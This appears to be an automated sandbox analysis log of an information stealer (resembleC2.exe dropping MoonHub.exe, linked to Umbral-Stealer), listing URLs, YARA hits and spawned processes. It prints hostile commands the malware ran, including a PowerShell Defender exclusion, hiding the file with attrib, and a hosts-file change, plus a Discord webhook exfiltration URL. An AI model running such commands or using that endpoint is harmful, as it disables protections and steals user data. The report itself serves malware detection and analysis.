                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
                            Source: powershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15EB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngP
                            Source: powershell.exe, 0000000B.00000002.2307172685.0000017A76B10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: 6z2guuz0ldkdgc1o.exe, 00000002.00000002.3349008957.0000000003BD1000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 0000000B.00000002.2278669843.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E80005C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2319166030.000001E800049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15D2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019934CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAE8000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                            Source: gqnbO.scr.5.drString found in binary or memory: https://discord.com/api/v10/users/
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AB1B000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1326652489054818346/f_cBTMEYAkXYcTbEkW-MUwYrefMORTfuoofsZ5ymJ5yR8BQ
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: https://discordapp.com/api/v9/users/
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr.
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chro0b
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.0b
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                            Source: gqnbO.scr.5.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AAF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Umbral-StealerhT
                            Source: powershell.exe, 0000001C.00000002.2652291240.0000019936523000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2650762653.0000019934BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A3D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000000.2180364705.00000156585B2000.00000002.00000001.01000000.00000008.sdmp, MoonHub.exe.0.dr, gqnbO.scr.5.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                            Source: powershell.exe, 0000000B.00000002.2297767430.0000017A10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2364720632.000001E15EB8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D33D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2434275066.000001E16D473000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD9007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD818CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2568073156.000001AD901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944E92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2823703286.0000019944D5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                            Source: powershell.exe, 00000011.00000002.2364720632.000001E15E925000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2461938148.000001AD81794000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2652291240.0000019936183000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565A745000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:50018 version: TLS 1.2

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E59C2E NtProtectVirtualMemory,2_2_00007FF848E59C2E
                            Source: C:\Users\user\Desktop\resembleC2.exeCode function: 0_2_00007FF848E90A310_2_00007FF848E90A31
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E595A02_2_00007FF848E595A0
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E54F362_2_00007FF848E54F36
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E578DD2_2_00007FF848E578DD
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E55CE22_2_00007FF848E55CE2
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E5958D2_2_00007FF848E5958D
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeCode function: 2_2_00007FF848E58C852_2_00007FF848E58C85
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EE22E05_2_00007FF848EE22E0
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EE22685_2_00007FF848EE2268
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA32185_2_00007FF848EA3218
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EDB3005_2_00007FF848EDB300
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EACCC85_2_00007FF848EACCC8
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EAB5B85_2_00007FF848EAB5B8
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA57405_2_00007FF848EA5740
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848E9E0725_2_00007FF848E9E072
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA1CB65_2_00007FF848EA1CB6
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA1C105_2_00007FF848EA1C10
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EAC7085_2_00007FF848EAC708
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF848EA78575_2_00007FF848EA7857
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490602985_2_00007FF849060298
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84905E29A5_2_00007FF84905E29A
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84905C2C15_2_00007FF84905C2C1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF849053D245_2_00007FF849053D24
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF849056D5E5_2_00007FF849056D5E
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490665615_2_00007FF849066561
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490689625_2_00007FF849068962
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490600805_2_00007FF849060080
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490584A65_2_00007FF8490584A6
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490633485_2_00007FF849063348
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490607755_2_00007FF849060775
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF849066E385_2_00007FF849066E38
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490506455_2_00007FF849050645
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84906C6C25_2_00007FF84906C6C2
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490529155_2_00007FF849052915
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84905DD525_2_00007FF84905DD52
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84905BD625_2_00007FF84905BD62
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490601885_2_00007FF849060188
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490601805_2_00007FF849060180
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF84905305D5_2_00007FF84905305D
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490524885_2_00007FF849052488
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF849051CBA5_2_00007FF849051CBA
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490526FA5_2_00007FF8490526FA
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeCode function: 5_2_00007FF8490567205_2_00007FF849056720
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FF848F4329215_2_00007FF848F43292
                            Source: 6z2guuz0ldkdgc1o.exe.0.drStatic PE information: No import functions for PE file found
                            Source: resembleC2.exe, 00000000.00000002.2183781246.0000000013008000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2184086711.000000001BB94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOpenWith.exe.muij% vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2184086711.000000001BB94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOpenWith.exej% vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs resembleC2.exe
                            Source: resembleC2.exe, 00000000.00000002.2183724584.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs resembleC2.exe
                            Source: resembleC2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 0.2.resembleC2.exe.13020e48.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 5.0.MoonHub.exe.156585b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: 0.2.resembleC2.exe.13020e48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\gqnbO.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                            Source: resembleC2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@45/27@7/4
                            Source: C:\Users\user\Desktop\resembleC2.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\resembleC2.exe.logJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4288:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                            Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeMutant created: \Sessions\1\BaseNamedObjects\J4sbYWr8St4yEiEwQYUu
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3856:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
                            Source: C:\Users\user\Desktop\resembleC2.exeMutant created: \Sessions\1\BaseNamedObjects\OdHMbp0RVvgQTSYNU
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                            Source: C:\Users\user\Desktop\resembleC2.exeFile created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeJump to behavior
                            Source: resembleC2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: resembleC2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\resembleC2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\resembleC2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: MoonHub.exe, 00000005.00000002.2902392061.000001565AA14000.00000004.00000800.00020000.00000000.sdmp, MoonHub.exe, 00000005.00000002.2902392061.000001565AA06000.00000004.00000800.00020000.00000000.sdmp, n3lt0LNlJJ55VO6.5.dr, pen0yrlLc65gBsT.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: resembleC2.exeReversingLabs: Detection: 57%
                            Source: resembleC2.exeVirustotal: Detection: 58%
                            Source: unknownProcess created: C:\Users\user\Desktop\resembleC2.exe "C:\Users\user\Desktop\resembleC2.exe"
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe "C:\Users\user\AppData\Local\Temp\6z2guuz0ldkdgc1o.exe"
                            Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                            Source: C:\Users\user\Desktop\resembleC2.exeProcess created: C:\Users\user\AppData\Local\Temp\MoonHub.exe "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\MoonHub.exe"
                            Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\MoonHub.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MoonHub.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
